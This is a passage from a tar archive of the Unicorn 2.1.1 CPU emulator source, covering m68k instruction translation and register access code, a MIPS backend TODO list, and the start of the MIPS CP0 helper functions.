f1c0, CF_ISA_B); INSN(cmp, b000, f1c0, CF_ISA_B); /* cmp.b */ INSN(cmp, b040, f1c0, CF_ISA_B); /* cmp.w */ INSN(cmpa, b0c0, f1c0, CF_ISA_B); /* cmpa.w */ INSN(cmp, b080, f1c0, CF_ISA_A); INSN(cmpa, b1c0, f1c0, CF_ISA_A); INSN(cmp, b000, f100, M68000); INSN(eor, b100, f100, M68000); INSN(cmpm, b108, f138, M68000); INSN(cmpa, b0c0, f0c0, M68000); INSN(eor, b180, f1c0, CF_ISA_A); BASE(and, c000, f000); INSN(exg_dd, c140, f1f8, M68000); INSN(exg_aa, c148, f1f8, M68000); INSN(exg_da, c188, f1f8, M68000); BASE(mulw, c0c0, f0c0); INSN(abcd_reg, c100, f1f8, M68000); INSN(abcd_mem, c108, f1f8, M68000); BASE(addsub, d000, f000); INSN(undef, d0c0, f0c0, CF_ISA_A); INSN(addx_reg, d180, f1f8, CF_ISA_A); INSN(addx_reg, d100, f138, M68000); INSN(addx_mem, d108, f138, M68000); INSN(adda, d1c0, f1c0, CF_ISA_A); INSN(adda, d0c0, f0c0, M68000); INSN(shift_im, e080, f0f0, CF_ISA_A); INSN(shift_reg, e0a0, f0f0, CF_ISA_A); INSN(shift8_im, e000, f0f0, M68000); INSN(shift16_im, e040, f0f0, M68000); INSN(shift_im, e080, f0f0, M68000); INSN(shift8_reg, e020, f0f0, M68000); INSN(shift16_reg, e060, f0f0, M68000); INSN(shift_reg, e0a0, f0f0, M68000); INSN(shift_mem, e0c0, fcc0, M68000); INSN(rotate_im, e090, f0f0, M68000); INSN(rotate8_im, e010, f0f0, M68000); INSN(rotate16_im, e050, f0f0, M68000); INSN(rotate_reg, e0b0, f0f0, M68000); INSN(rotate8_reg, e030, f0f0, M68000); INSN(rotate16_reg, e070, f0f0, M68000); INSN(rotate_mem, e4c0, fcc0, M68000); INSN(bfext_mem, e9c0, fdc0, BITFIELD); /* bfextu & bfexts */ INSN(bfext_reg, e9c0, fdf8, BITFIELD); INSN(bfins_mem, efc0, ffc0, BITFIELD); INSN(bfins_reg, efc0, fff8, BITFIELD); INSN(bfop_mem, eac0, ffc0, BITFIELD); /* bfchg */ INSN(bfop_reg, eac0, fff8, BITFIELD); /* bfchg */ INSN(bfop_mem, ecc0, ffc0, BITFIELD); /* bfclr */ INSN(bfop_reg, ecc0, fff8, BITFIELD); /* bfclr */ INSN(bfop_mem, edc0, ffc0, BITFIELD); /* bfffo */ INSN(bfop_reg, edc0, fff8, BITFIELD); /* bfffo */ INSN(bfop_mem, eec0, ffc0, BITFIELD); /* bfset */ INSN(bfop_reg, eec0, fff8, BITFIELD); /* bfset */ INSN(bfop_mem, e8c0, ffc0, BITFIELD); /* bftst */ INSN(bfop_reg, e8c0, fff8, BITFIELD); /* bftst */ BASE(undef_fpu, f000, f000); INSN(fpu, f200, ffc0, CF_FPU); INSN(fbcc, f280, ffc0, CF_FPU); INSN(fpu, f200, ffc0, FPU); INSN(fscc, f240, ffc0, FPU); INSN(fbcc, f280, ff80, FPU); INSN(frestore, f340, ffc0, CF_FPU); INSN(fsave, f300, ffc0, CF_FPU); INSN(frestore, f340, ffc0, FPU); INSN(fsave, f300, ffc0, FPU); INSN(intouch, f340, ffc0, CF_ISA_A); INSN(cpushl, f428, ff38, CF_ISA_A); INSN(cpush, f420, ff20, M68040); INSN(cinv, f400, ff20, M68040); INSN(pflush, f500, ffe0, M68040); INSN(ptest, f548, ffd8, M68040); INSN(wddata, fb00, ff00, CF_ISA_A); INSN(wdebug, fbc0, ffc0, CF_ISA_A); INSN(move16_mem, f600, ffe0, M68040); INSN(move16_reg, f620, fff8, M68040); #undef INSN } static void m68k_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUM68KState *env = cpu->env_ptr; // unicorn setup dc->uc = cpu->uc; dc->env = env; dc->pc = dc->base.pc_first; dc->cc_op = CC_OP_DYNAMIC; dc->cc_op_synced = 1; dc->done_mac = 0; dc->writeback_mask = 0; init_release_array(dc); } static void m68k_tr_tb_start(DisasContextBase *dcbase, CPUState *cpu) { } static void m68k_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, dc->cc_op); } static bool m68k_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); gen_exception(dc, dc->base.pc_next, EXCP_DEBUG); /* * The address covered by the breakpoint must be included in * [tb->pc, tb->pc + tb->size) in order to for it to be * properly cleared -- thus we increment the PC here so that * the logic setting tb->size below does the right thing. */ dc->base.pc_next += 2; return true; } static void m68k_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPUM68KState *env = cpu->env_ptr; uint16_t insn; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, dc->pc)) { gen_exception(dc, dc->pc, EXCP_HLT); return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, dc->pc)) { // Sync PC in advance tcg_gen_movi_i32(tcg_ctx, QREG_PC, dc->pc); gen_uc_tracecode(tcg_ctx, 2, UC_HOOK_CODE_IDX, uc, dc->pc); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } insn = read_im16(env, dc); opcode_table[insn](env, dc, insn); do_writebacks(dc); do_release(dc); dc->base.pc_next = dc->pc; if (dc->base.is_jmp == DISAS_NEXT) { /* * Stop translation when the next insn might touch a new page. * This ensures that prefetch aborts at the right place. * * We cannot determine the size of the next insn without * completely decoding it. However, the maximum insn size * is 32 bytes, so end if we do not have that much remaining. * This may produce several small TBs at the end of each page, * but they will all be linked with goto_tb. * * ??? ColdFire maximum is 4 bytes; MC68000's maximum is also * smaller than MC68020's. */ target_ulong start_page_offset = dc->pc - (dc->base.pc_first & TARGET_PAGE_MASK); if (start_page_offset >= TARGET_PAGE_SIZE - 32) { dc->base.is_jmp = DISAS_TOO_MANY; } } } static void m68k_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; switch (dc->base.is_jmp) { case DISAS_NORETURN: break; case DISAS_TOO_MANY: update_cc_op(dc); if (dc->base.singlestep_enabled) { tcg_gen_movi_i32(tcg_ctx, QREG_PC, dc->pc); gen_raise_exception(tcg_ctx, EXCP_DEBUG); } else { gen_jmp_tb(dc, 0, dc->pc); } break; case DISAS_JUMP: /* We updated CC_OP and PC in gen_jmp/gen_jmp_im. */ if (dc->base.singlestep_enabled) { gen_raise_exception(tcg_ctx, EXCP_DEBUG); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } break; case DISAS_EXIT: /* * We updated CC_OP and PC in gen_exit_tb, but also modified * other state that may require returning to the main loop. */ if (dc->base.singlestep_enabled) { gen_raise_exception(tcg_ctx, EXCP_DEBUG); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } break; default: g_assert_not_reached(); } } static const TranslatorOps m68k_tr_ops = { .init_disas_context = m68k_tr_init_disas_context, .tb_start = m68k_tr_tb_start, .insn_start = m68k_tr_insn_start, .breakpoint_check = m68k_tr_breakpoint_check, .translate_insn = m68k_tr_translate_insn, .tb_stop = m68k_tr_tb_stop, }; void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns) { DisasContext dc; memset(&dc, 0, sizeof(dc)); translator_loop(&m68k_tr_ops, &dc.base, cpu, tb, max_insns); } #if 0 static double floatx80_to_double(CPUM68KState *env, uint16_t high, uint64_t low) { floatx80 a = { .high = high, .low = low }; union { float64 f64; double d; } u; u.f64 = floatx80_to_float64(a, &env->fp_status); return u.d; } #endif void restore_state_to_opc(CPUM68KState *env, TranslationBlock *tb, target_ulong *data) { int cc_op = data[1]; env->pc = data[0]; if (cc_op != CC_OP_DYNAMIC) { env->cc_op = cc_op; } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/m68k/unicorn.c������������������������������������������������������������0000664�0000000�0000000�00000006757�14675241067�0020066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" M68kCPU *cpu_m68k_init(struct uc_struct *uc); static void m68k_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUM68KState *)uc->cpu->env_ptr)->pc = address; } static uint64_t m68k_get_pc(struct uc_struct *uc) { return ((CPUM68KState *)uc->cpu->env_ptr)->pc; } static void m68k_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; M68kCPU *cpu = (M68kCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->aregs, 0, sizeof(env->aregs)); memset(env->dregs, 0, sizeof(env->dregs)); env->pc = 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUM68KState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->aregs[regid - UC_M68K_REG_A0]; } else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->dregs[regid - UC_M68K_REG_D0]; } else { switch (regid) { default: break; case UC_M68K_REG_PC: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->pc; break; case UC_M68K_REG_SR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->sr; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUM68KState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7) { CHECK_REG_TYPE(uint32_t); env->aregs[regid - UC_M68K_REG_A0] = *(uint32_t *)value; } else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7) { CHECK_REG_TYPE(uint32_t); env->dregs[regid - UC_M68K_REG_D0] = *(uint32_t *)value; } else { switch (regid) { default: break; case UC_M68K_REG_PC: CHECK_REG_TYPE(uint32_t); env->pc = *(uint32_t *)value; *setpc = 1; break; case UC_M68K_REG_SR: CHECK_REG_TYPE(uint32_t); cpu_m68k_set_sr(env, *(uint32_t *)value); break; } } return ret; } static int m68k_cpus_init(struct uc_struct *uc, const char *cpu_model) { M68kCPU *cpu; cpu = cpu_m68k_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = m68k_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = m68k_set_pc; uc->get_pc = m68k_get_pc; uc->cpus_init = m68k_cpus_init; uc->cpu_context_size = offsetof(CPUM68KState, end_reset_fields); uc_common_init(uc); } �����������������unicorn-2.1.1/qemu/target/m68k/unicorn.h������������������������������������������������������������0000664�0000000�0000000�00000000731�14675241067�0020055�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_M68K_H #define UC_QEMU_TARGET_M68K_H // functions to read & write registers uc_err reg_read_m68k(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_m68k(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_m68k(struct uc_struct *uc); #endif ���������������������������������������unicorn-2.1.1/qemu/target/mips/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016411�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/TODO�����������������������������������������������������������������0000664�0000000�0000000�00000003677�14675241067�0017116�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Unsolved issues/bugs in the mips/mipsel backend ----------------------------------------------- General ------- - Unimplemented ASEs: - MDMX - SmartMIPS - microMIPS DSP r1 & r2 encodings - MT ASE only partially implemented and not functional - Shadow register support only partially implemented, lacks set switching on interrupt/exception. - 34K ITC not implemented. - A general lack of documentation, especially for technical internals. Existing documentation is x86-centric. - Reverse endianness bit not implemented - The TLB emulation is very inefficient: QEMU's softmmu implements a x86-style MMU, with separate entries for read/write/execute, a TLB index which is just a modulo of the virtual address, and a set of TLBs for each user/kernel/supervisor MMU mode. MIPS has a single entry for read/write/execute and only one MMU mode. But it is fully associative with randomized entry indices, and uses up to 256 ASID tags as additional matching criterion (which roughly equates to 256 MMU modes). It also has a global flag which causes entries to match regardless of ASID. To cope with these differences, QEMU currently flushes the TLB at each ASID change. Using the MMU modes to implement ASIDs hinges on implementing the global bit efficiently. - save/restore of the CPU state is not implemented (see machine.c). MIPS64 ------ - Userland emulation (both n32 and n64) not functional. "Generic" 4Kc system emulation ------------------------------ - Doesn't correspond to any real hardware. Should be removed some day, U-Boot is the last remaining user. PICA 61 system emulation ------------------------ - No framebuffer support yet. MALTA system emulation ---------------------- - We fake firmware support instead of doing the real thing - Real firmware (YAMON) falls over when trying to init RAM, presumably due to lacking system controller emulation. - Bonito system controller not implemented - MSC1 system controller not implemented �����������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/cp0_helper.c���������������������������������������������������������0000664�0000000�0000000�00000132736�14675241067�0020612�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helpers for emulation of CP0-related MIPS instructions. * * Copyright (C) 2004-2005 Jocelyn Mayer * Copyright (C) 2020 Wave Computing, Inc. * Copyright (C) 2020 Aleksandar Markovic <amarkovic@wavecomp.com> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/memop.h" //#include "sysemu/kvm.h" /* SMP helpers. */ static bool mips_vpe_is_wfi(MIPSCPU *c) { CPUState *cpu = CPU(c); CPUMIPSState *env = &c->env; /* * If the VPE is halted but otherwise active, it means it's waiting for * an interrupt.\ */ return cpu->halted && mips_vpe_active(env); } #if 0 static bool mips_vp_is_wfi(MIPSCPU *c) { CPUState *cpu = CPU(c); CPUMIPSState *env = &c->env; return cpu->halted && mips_vp_active(env, cpu); } #endif static inline void mips_vpe_wake(MIPSCPU *c) { /* * Don't set ->halted = 0 directly, let it be done via cpu_has_work * because there might be other conditions that state that c should * be sleeping. */ cpu_interrupt(CPU(c), CPU_INTERRUPT_WAKE); } static inline void mips_vpe_sleep(MIPSCPU *cpu) { CPUState *cs = CPU(cpu); /* * The VPE was shut off, really go to bed. * Reset any old _WAKE requests. */ cs->halted = 1; cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); } static inline void mips_tc_wake(MIPSCPU *cpu, int tc) { CPUMIPSState *c = &cpu->env; /* FIXME: TC reschedule. */ if (mips_vpe_active(c) && !mips_vpe_is_wfi(cpu)) { mips_vpe_wake(cpu); } } static inline void mips_tc_sleep(MIPSCPU *cpu, int tc) { CPUMIPSState *c = &cpu->env; /* FIXME: TC reschedule. */ if (!mips_vpe_active(c)) { mips_vpe_sleep(cpu); } } /** * mips_cpu_map_tc: * @env: CPU from which mapping is performed. * @tc: Should point to an int with the value of the global TC index. * * This function will transform @tc into a local index within the * returned #CPUMIPSState. */ /* * FIXME: This code assumes that all VPEs have the same number of TCs, * which depends on runtime setup. Can probably be fixed by * walking the list of CPUMIPSStates. */ static CPUMIPSState *mips_cpu_map_tc(CPUMIPSState *env, int *tc) { CPUState *cs; // int vpe_idx; int tc_idx = *tc; if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP))) { /* Not allowed to address other CPUs. */ *tc = env->current_tc; return env; } cs = env_cpu(env); // vpe_idx = tc_idx / cs->nr_threads; *tc = tc_idx % cs->nr_threads; return env; #if 0 MIPSCPU *cpu; CPUState *other_cs; other_cs = qemu_get_cpu(vpe_idx); if (other_cs == NULL) { return env; } cpu = MIPS_CPU(other_cs); return &cpu->env; #endif } /* * The per VPE CP0_Status register shares some fields with the per TC * CP0_TCStatus registers. These fields are wired to the same registers, * so changes to either of them should be reflected on both registers. * * Also, EntryHi shares the bottom 8 bit ASID with TCStauts. * * These helper call synchronizes the regs for a given cpu. */ /* * Called for updates to CP0_Status. Defined in "cpu.h" for gdbstub.c. * static inline void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, * int tc); */ /* Called for updates to CP0_TCStatus. */ static void sync_c0_tcstatus(CPUMIPSState *cpu, int tc, target_ulong v) { uint32_t status; uint32_t tcu, tmx, tasid, tksu; uint32_t mask = ((1U << CP0St_CU3) | (1 << CP0St_CU2) | (1 << CP0St_CU1) | (1 << CP0St_CU0) | (1 << CP0St_MX) | (3 << CP0St_KSU)); tcu = (v >> CP0TCSt_TCU0) & 0xf; tmx = (v >> CP0TCSt_TMX) & 0x1; tasid = v & cpu->CP0_EntryHi_ASID_mask; tksu = (v >> CP0TCSt_TKSU) & 0x3; status = tcu << CP0St_CU0; status |= tmx << CP0St_MX; status |= tksu << CP0St_KSU; cpu->CP0_Status &= ~mask; cpu->CP0_Status |= status; /* Sync the TASID with EntryHi. */ cpu->CP0_EntryHi &= ~cpu->CP0_EntryHi_ASID_mask; cpu->CP0_EntryHi |= tasid; compute_hflags(cpu); } /* Called for updates to CP0_EntryHi. */ static void sync_c0_entryhi(CPUMIPSState *cpu, int tc) { int32_t *tcst; uint32_t asid, v = cpu->CP0_EntryHi; asid = v & cpu->CP0_EntryHi_ASID_mask; if (tc == cpu->current_tc) { tcst = &cpu->active_tc.CP0_TCStatus; } else { tcst = &cpu->tcs[tc].CP0_TCStatus; } *tcst &= ~cpu->CP0_EntryHi_ASID_mask; *tcst |= asid; } /* CP0 helpers */ target_ulong helper_mfc0_mvpcontrol(CPUMIPSState *env) { return env->mvp->CP0_MVPControl; } target_ulong helper_mfc0_mvpconf0(CPUMIPSState *env) { return env->mvp->CP0_MVPConf0; } target_ulong helper_mfc0_mvpconf1(CPUMIPSState *env) { return env->mvp->CP0_MVPConf1; } target_ulong helper_mfc0_random(CPUMIPSState *env) { return (int32_t)cpu_mips_get_random(env); } target_ulong helper_mfc0_tcstatus(CPUMIPSState *env) { return env->active_tc.CP0_TCStatus; } target_ulong helper_mftc0_tcstatus(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCStatus; } else { return other->tcs[other_tc].CP0_TCStatus; } } target_ulong helper_mfc0_tcbind(CPUMIPSState *env) { return env->active_tc.CP0_TCBind; } target_ulong helper_mftc0_tcbind(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCBind; } else { return other->tcs[other_tc].CP0_TCBind; } } target_ulong helper_mfc0_tcrestart(CPUMIPSState *env) { return env->active_tc.PC; } target_ulong helper_mftc0_tcrestart(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.PC; } else { return other->tcs[other_tc].PC; } } target_ulong helper_mfc0_tchalt(CPUMIPSState *env) { return env->active_tc.CP0_TCHalt; } target_ulong helper_mftc0_tchalt(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCHalt; } else { return other->tcs[other_tc].CP0_TCHalt; } } target_ulong helper_mfc0_tccontext(CPUMIPSState *env) { return env->active_tc.CP0_TCContext; } target_ulong helper_mftc0_tccontext(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCContext; } else { return other->tcs[other_tc].CP0_TCContext; } } target_ulong helper_mfc0_tcschedule(CPUMIPSState *env) { return env->active_tc.CP0_TCSchedule; } target_ulong helper_mftc0_tcschedule(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCSchedule; } else { return other->tcs[other_tc].CP0_TCSchedule; } } target_ulong helper_mfc0_tcschefback(CPUMIPSState *env) { return env->active_tc.CP0_TCScheFBack; } target_ulong helper_mftc0_tcschefback(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCScheFBack; } else { return other->tcs[other_tc].CP0_TCScheFBack; } } target_ulong helper_mfc0_count(CPUMIPSState *env) { // return (int32_t)cpu_mips_get_count(env); return 0; } target_ulong helper_mfc0_saar(CPUMIPSState *env) { if ((env->CP0_SAARI & 0x3f) < 2) { return (int32_t) env->CP0_SAAR[env->CP0_SAARI & 0x3f]; } return 0; } target_ulong helper_mfhc0_saar(CPUMIPSState *env) { if ((env->CP0_SAARI & 0x3f) < 2) { return env->CP0_SAAR[env->CP0_SAARI & 0x3f] >> 32; } return 0; } target_ulong helper_mftc0_entryhi(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_EntryHi; } target_ulong helper_mftc0_cause(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); int32_t tccause; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { tccause = other->CP0_Cause; } else { tccause = other->CP0_Cause; } return tccause; } target_ulong helper_mftc0_status(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_Status; } target_ulong helper_mfc0_lladdr(CPUMIPSState *env) { return (int32_t)(env->CP0_LLAddr >> env->CP0_LLAddr_shift); } target_ulong helper_mfc0_maar(CPUMIPSState *env) { return (int32_t) env->CP0_MAAR[env->CP0_MAARI]; } target_ulong helper_mfhc0_maar(CPUMIPSState *env) { return env->CP0_MAAR[env->CP0_MAARI] >> 32; } target_ulong helper_mfc0_watchlo(CPUMIPSState *env, uint32_t sel) { return (int32_t)env->CP0_WatchLo[sel]; } target_ulong helper_mfc0_watchhi(CPUMIPSState *env, uint32_t sel) { return (int32_t) env->CP0_WatchHi[sel]; } target_ulong helper_mfhc0_watchhi(CPUMIPSState *env, uint32_t sel) { return env->CP0_WatchHi[sel] >> 32; } target_ulong helper_mfc0_debug(CPUMIPSState *env) { target_ulong t0 = env->CP0_Debug; if (env->hflags & MIPS_HFLAG_DM) { t0 |= 1 << CP0DB_DM; } return t0; } target_ulong helper_mftc0_debug(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); int32_t tcstatus; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { tcstatus = other->active_tc.CP0_Debug_tcstatus; } else { tcstatus = other->tcs[other_tc].CP0_Debug_tcstatus; } /* XXX: Might be wrong, check with EJTAG spec. */ return (other->CP0_Debug & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | (tcstatus & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); } #if defined(TARGET_MIPS64) target_ulong helper_dmfc0_tcrestart(CPUMIPSState *env) { return env->active_tc.PC; } target_ulong helper_dmfc0_tchalt(CPUMIPSState *env) { return env->active_tc.CP0_TCHalt; } target_ulong helper_dmfc0_tccontext(CPUMIPSState *env) { return env->active_tc.CP0_TCContext; } target_ulong helper_dmfc0_tcschedule(CPUMIPSState *env) { return env->active_tc.CP0_TCSchedule; } target_ulong helper_dmfc0_tcschefback(CPUMIPSState *env) { return env->active_tc.CP0_TCScheFBack; } target_ulong helper_dmfc0_lladdr(CPUMIPSState *env) { return env->CP0_LLAddr >> env->CP0_LLAddr_shift; } target_ulong helper_dmfc0_maar(CPUMIPSState *env) { return env->CP0_MAAR[env->CP0_MAARI]; } target_ulong helper_dmfc0_watchlo(CPUMIPSState *env, uint32_t sel) { return env->CP0_WatchLo[sel]; } target_ulong helper_dmfc0_watchhi(CPUMIPSState *env, uint32_t sel) { return env->CP0_WatchHi[sel]; } target_ulong helper_dmfc0_saar(CPUMIPSState *env) { if ((env->CP0_SAARI & 0x3f) < 2) { return env->CP0_SAAR[env->CP0_SAARI & 0x3f]; } return 0; } #endif /* TARGET_MIPS64 */ void helper_mtc0_index(CPUMIPSState *env, target_ulong arg1) { uint32_t index_p = env->CP0_Index & 0x80000000; uint32_t tlb_index = arg1 & 0x7fffffff; if (tlb_index < env->tlb->nb_tlb) { if (env->insn_flags & ISA_MIPS32R6) { index_p |= arg1 & 0x80000000; } env->CP0_Index = index_p | tlb_index; } } void helper_mtc0_mvpcontrol(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0; uint32_t newval; if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) { mask |= (1 << CP0MVPCo_CPA) | (1 << CP0MVPCo_VPC) | (1 << CP0MVPCo_EVP); } if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) { mask |= (1 << CP0MVPCo_STLB); } newval = (env->mvp->CP0_MVPControl & ~mask) | (arg1 & mask); /* TODO: Enable/disable shared TLB, enable/disable VPEs. */ env->mvp->CP0_MVPControl = newval; } void helper_mtc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) { uint32_t mask; uint32_t newval; mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); newval = (env->CP0_VPEControl & ~mask) | (arg1 & mask); /* * Yield scheduler intercept not implemented. * Gating storage scheduler intercept not implemented. */ /* TODO: Enable/disable TCs. */ env->CP0_VPEControl = newval; } void helper_mttc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); uint32_t mask; uint32_t newval; mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); newval = (other->CP0_VPEControl & ~mask) | (arg1 & mask); /* TODO: Enable/disable TCs. */ other->CP0_VPEControl = newval; } target_ulong helper_mftc0_vpecontrol(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); /* FIXME: Mask away return zero on read bits. */ return other->CP0_VPEControl; } target_ulong helper_mftc0_vpeconf0(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_VPEConf0; } void helper_mtc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0; uint32_t newval; if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) { if (env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA)) { mask |= (0xff << CP0VPEC0_XTC); } mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); } newval = (env->CP0_VPEConf0 & ~mask) | (arg1 & mask); /* TODO: TC exclusive handling due to ERL/EXL. */ env->CP0_VPEConf0 = newval; } void helper_mttc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) { int other_tc = 